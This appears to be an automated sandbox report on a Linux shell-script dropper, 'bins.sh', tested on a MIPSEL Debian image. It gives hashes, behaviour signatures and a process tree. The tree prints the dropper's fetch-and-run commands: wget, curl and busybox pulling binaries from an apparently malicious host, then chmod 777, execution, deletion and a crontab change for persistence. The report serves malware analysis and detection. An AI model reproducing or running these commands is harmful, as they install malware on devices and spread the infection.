Analysis
-
max time kernel
123s -
max time network
153s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 20:07
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
b1a4477e9c3d0e98d5145272953d06b5
-
SHA1
338d214d12eae1ac6ff530e04df6cb6b8497e4a8
-
SHA256
5bedea2089028be9979c0e2d54403f6440b59cbc64c081aea23c710666fac622
-
SHA512
316bb7d17076445d00b5540a1fb0f7938cf08900b7336028a537afd73068cddc86604fd4437ef96868e3821a01a7ef5d5b08431ce58f3904c3d5b8916fc25597
-
SSDEEP
192:q72+4zDnqRh1zM03C+iq2fOo4Erm2maM03C+eDnqRhjl4Erm2YiH2+h:5+zM03C+iqVo4Erm2maM03C+F4Erm2d
Malware Config
Signatures
-
Contacts a large (1705) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid process 744 chmod 797 chmod 905 chmod 917 chmod -
Executes dropped EXE 2 IoCs
Processes:
tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqEhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZioc pid process /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq 745 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ 798 EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ -
Renames itself 1 IoCs
Processes:
EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZpid process 799 EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.iuKPqZ crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZdescription ioc process File opened for reading /proc/1148/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1176/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1202/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1242/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/18/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/885/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/916/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1083/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/840/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1212/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1216/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1264/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/76/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/848/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1182/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1199/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/958/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1044/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1106/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1201/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/5/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/811/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/814/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1024/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1091/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1169/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/358/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/712/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/938/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1002/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/160/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1190/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1256/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/878/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1249/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1307/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/824/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1207/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1229/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1280/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1236/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1250/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/858/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/970/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1073/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1139/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/875/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/981/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1043/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1147/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/13/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/710/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/785/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/857/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1325/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1055/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1138/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1186/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/384/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/976/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1150/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/950/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/975/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ File opened for reading /proc/1156/cmdline EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ -
System Network Configuration Discovery 1 TTPs 15 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxrmwgettipd5aLyyzlCilPXJXJMqUIWBz7SJGagtqcurlbusyboxwgetbusyboxwgetcurlwgetcurlwgetcurlbusyboxpid process 743 busybox 747 rm 922 wget 745 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq 749 curl 796 busybox 890 wget 902 busybox 911 wget 913 curl 720 wget 740 curl 748 wget 900 curl 915 busybox -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlcurldescription ioc process File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq wget File opened for modification /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq curl File opened for modification /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
PID:743 -
/bin/chmodchmod 777 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- File and Directory Permissions Modification
PID:744 -
/tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq./tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:745 -
/bin/rmrm tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq2⤵
- System Network Configuration Discovery
PID:747 -
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵
- System Network Configuration Discovery
PID:748 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵
- System Network Configuration Discovery
PID:796 -
/bin/chmodchmod 777 EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵
- File and Directory Permissions Modification
PID:797 -
/tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ./EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:798 -
/bin/shsh -c "crontab -l"3⤵PID:800
-
/usr/bin/crontabcrontab -l4⤵PID:801
-
/bin/shsh -c "crontab -"3⤵PID:802
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:803 -
/bin/rmrm EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ2⤵PID:806
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵
- System Network Configuration Discovery
PID:890 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵
- System Network Configuration Discovery
PID:900 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵
- System Network Configuration Discovery
PID:902 -
/bin/chmodchmod 777 waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵
- File and Directory Permissions Modification
PID:905 -
/tmp/waMUu3wStjbh57023DqN3DVIdOczWDiUhI./waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵PID:907
-
/bin/rmrm waMUu3wStjbh57023DqN3DVIdOczWDiUhI2⤵PID:909
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵
- System Network Configuration Discovery
PID:911 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵
- System Network Configuration Discovery
PID:913 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵
- System Network Configuration Discovery
PID:915 -
/bin/chmodchmod 777 nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵
- File and Directory Permissions Modification
PID:917 -
/tmp/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4./nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵PID:918
-
/bin/rmrm nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp42⤵PID:920
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uon8OvrrB9Frxi0geNjzNpkUWmPk8Pw5uP2⤵
- System Network Configuration Discovery
PID:922
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD50b8fdb3b7750325facdafc1a8e8ea6b1
SHA158302cc52313b8e6f2ad9dcc8c744e744eb850dc
SHA25689942faacb2ac492486e35aac40337031e9ba1f7a38013002ea1896adc5e01db
SHA5125e0f4f6ee06b0d451ac2ca51863a9d791f41a355f7223a9f65185e228862d9a60d45e9a9a411aa57f6b4ce0ae11728013aa9eaad0d0c6d9502d06684bfa5e8fb